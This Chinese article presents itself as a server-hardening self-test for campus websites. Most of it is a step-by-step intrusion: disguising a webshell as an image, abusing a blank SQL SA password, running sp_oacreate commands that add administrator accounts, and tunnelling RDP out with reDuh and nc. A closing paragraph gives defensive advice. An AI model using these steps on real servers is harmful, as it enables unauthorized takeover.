讓校園網(wǎng)服務(wù)器更安全

張晶

摘要：隨著校園網(wǎng)絡(luò)的普及，很多學(xué)校都建立了自己的校園網(wǎng)站，并擁有自己的服務(wù)器。然而管理方面的疏忽以及服務(wù)器本身的漏洞，往往使校園網(wǎng)站成為黑客的眼中釘。本文通過對黑客入侵服務(wù)器過程的詳細闡述，逐一揭示網(wǎng)站管理員應(yīng)做卻往往忽視的防范措施，以達到對服務(wù)器進行安全問題檢測的目的。

關(guān)鍵詞：程序后臺；木馬；提權(quán)；映射端口；遠程登錄

現(xiàn)在許多Windows2000/2003/2008服務(wù)器都或多或少的存在安全問題，不是系統(tǒng)軟件存在漏洞，就是網(wǎng)站程序上傳出現(xiàn)漏洞，再加上網(wǎng)站管理員往往忽視了一些有效的防御手段，這都會使網(wǎng)站在黑客面前不堪一擊，他們可以在網(wǎng)站管理員毫無覺察的情況下，任意提權(quán)，上傳木馬，并下載其中的程序，從而使整個服務(wù)器的運行出現(xiàn)問題。

如今，校園網(wǎng)服務(wù)器的安全，關(guān)系到整個學(xué)校日常工作的正常運行，一旦被侵入，后果不堪設(shè)想，而此類事故的產(chǎn)生必有隱患，那么就讓我們的管理員行駛“綠客”的職責(zé)，在與黑客“賽跑”的過程中，提前一步對服務(wù)器進行檢測，避免以上種種問題的發(fā)生，為您所管理的服務(wù)器打上一針強心劑。

● 檢測的環(huán)境及工具

◇準備一臺服務(wù)器，如Windows Server 2003 sp2 SQL2000/2005/2008系統(tǒng)。

◇準備木馬工具：ASP木馬、ASPX木馬、PHP木馬，Mstsc.exe遠程登錄工具，JAVA語言環(huán)境、NC.exe、內(nèi)網(wǎng)滲透利器——reDuh。

● 服務(wù)器檢測實戰(zhàn)演練

1.上傳木馬

服務(wù)器里一般都安裝了網(wǎng)站程序ASP(aspx.net)+SQL、PHP+MYSQL等，并且都提供后臺演示或注冊上傳功能，這樣我們就可以通過網(wǎng)站程序的后臺進行上傳木馬或者提權(quán)。

ASPX圖片木馬就是小圖片加上aspx木馬程序生成的文件，看起來是圖片，執(zhí)行時是木馬，上傳時能逃過文件檢測判定。在Windows下的DOS窗口，鍵入copy1.jpg/b+ 2.aspx/a2.jpg，便可以制作木馬圖片。然后，我們根據(jù)程序網(wǎng)站提供的后臺演示，上傳圖片木馬，進入木馬程序界面，從圖1中可見，該服務(wù)器的管理員并沒有進行妥善管理，沒有在aspx.net程序目錄以及ASPX中寫權(quán)限防止上傳圖片木馬。

2.通過木馬程序進行提權(quán)

接下來，我們查看SQL用戶，有些網(wǎng)站管理員直接給SQL超級用戶（SA）的口令，卻沒有設(shè)置密碼進行保護，這也使得服務(wù)器較容易遭到病毒或木馬的攻擊。通過圖1中的Webshell，我們可以上傳其他木馬方便我們對SQL提權(quán)（如圖2），進而通過SQL提升自己的管理權(quán)限。

3.破解用戶與口令

本地SQL服務(wù)器是我們要遠程連接到的SQL服務(wù)器，但想要實現(xiàn)遠程連接，必先知道其用戶與口令。有的網(wǎng)站程序的用戶與口令，就是SQL的超級用戶（SA）及口令，這只能說明管理員極其不小心或者學(xué)藝不精，于是,我們通過木馬程序編輯功能查詢aspx.net網(wǎng)站程序的web.config這個配置文件，可以查到SQL數(shù)據(jù)庫用戶名與密碼：uid=sa;pwd=，即用戶為SA，密碼為空。

4.通過查詢分析器提權(quán)

然后，我們通過本地SQL連接到遠程服務(wù)器，并通過查詢分析器提權(quán)。

（1）連接數(shù)據(jù)庫。

driver={SQL Server}；server=服務(wù)器IP；uid=用戶名；pwd=密碼；database=數(shù)據(jù)庫名

（2）添加新用戶。

declare@shell int exec sp_oacreate 'wscript.shell'，@shell output exec sp_oamethod @shell，'run'，null，'c:windowssystem32cmd.exe /c net user 新用戶 密碼 /add'

（3）把用戶加到管理組。

declare @shell int exec sp_oacreate 'wscript.shell'，@shell output exec sp_oamethod@shell，'run'，null，'c:windowssystem32cmd.exe /c net localgroup administrators 新用戶 /add'

（4）激活GUEST用戶。

declare@shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell，'run'，null，'c:windowssystem32cmd.exe /c net user guest /active:yes'

（5）把Guest加到管理組。

declare@shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod@shell，'run'，null，'c:windowssystem32cmd.exe /c net localgroup Administrators Guest /add'

進行上面一系列的提權(quán)后，生成管理用戶與口令，進行遠程登錄服務(wù)器。

5.內(nèi)網(wǎng)滲透利器的遠程執(zhí)行

根據(jù)我們上傳的木馬進行操作，上傳為我們服務(wù)的其他木馬，通過木馬上傳的內(nèi)網(wǎng)滲透利器在服務(wù)器上遠程執(zhí)行，但不要關(guān)閉（如圖3）。

6.本地與遠程架橋

用服務(wù)器上的木馬與本地“JAVA語言+NC”進行連接，架設(shè)一橋，映射端口，偽裝成一個局域網(wǎng)，因為遠程服務(wù)器只能在本地運行，我們可以采用127.0.0.1這個地址遠程登錄，進入服務(wù)器，內(nèi)網(wǎng)的服務(wù)器也是通過這種方法進行檢測（如上頁圖4）。

（1）在本地DOS窗口下運行JAVA語言連接遠程服務(wù)器上的木馬，打開遠程服務(wù)器在本地1010端口。注意這個不能關(guān)閉。

DOS下命令：java -jar reduhclient.jar http://....../ reDuh.aspx

（2）新開一個命令行，用NC連接本機1010端口。

DOS命令窗口輸入命令：nc -vv localhost 1010（如上頁圖5）。

在DOS命令窗口輸入命令：[createTunnel]1234:127.0.0.1:3389，連接遠程服務(wù)器3389端口。

（3）最后本機窗口有三個，一個是遠程服務(wù)木馬，另兩個是本地木馬映射連接端口(如圖6)。

7.進入遠程服務(wù)器

在本地用mstsc.exe遠程登錄程序，進入遠程服務(wù)器。用戶口令以Sys_guest為例。這樣我們就控制了整個服務(wù)器（如圖7、圖8）。（本方法在客戶端Windows server 2003 sp2+SQL2000+JAVA，服務(wù)器Windows server 2003/2008+sql2000/2005+aspx環(huán)境下測試通過）。

通過模擬黑客侵入服務(wù)器的過程，我們發(fā)現(xiàn)一般服務(wù)器需要關(guān)閉一些網(wǎng)站目錄、寫權(quán)限、增加一些目錄執(zhí)行ASPX程序運行、網(wǎng)站跨站權(quán)限漏洞。同時，SQL服務(wù)器要及時升級，刪除一些不必要的限制，SQL超級權(quán)限不能輕易授權(quán)，以及網(wǎng)站程序上傳漏洞、編輯器的漏洞，還需要通過升級編輯器等操作來完善，管理員也要學(xué)會一些網(wǎng)站安全防范措施，如遠程用戶進入服務(wù)器時，可以聯(lián)動報警發(fā)短信通知等功能。

本文參考網(wǎng)站：http://www.sensepost.com/labs/tools/pentest/reduh，同時感謝網(wǎng)友exin對本文提供幫助。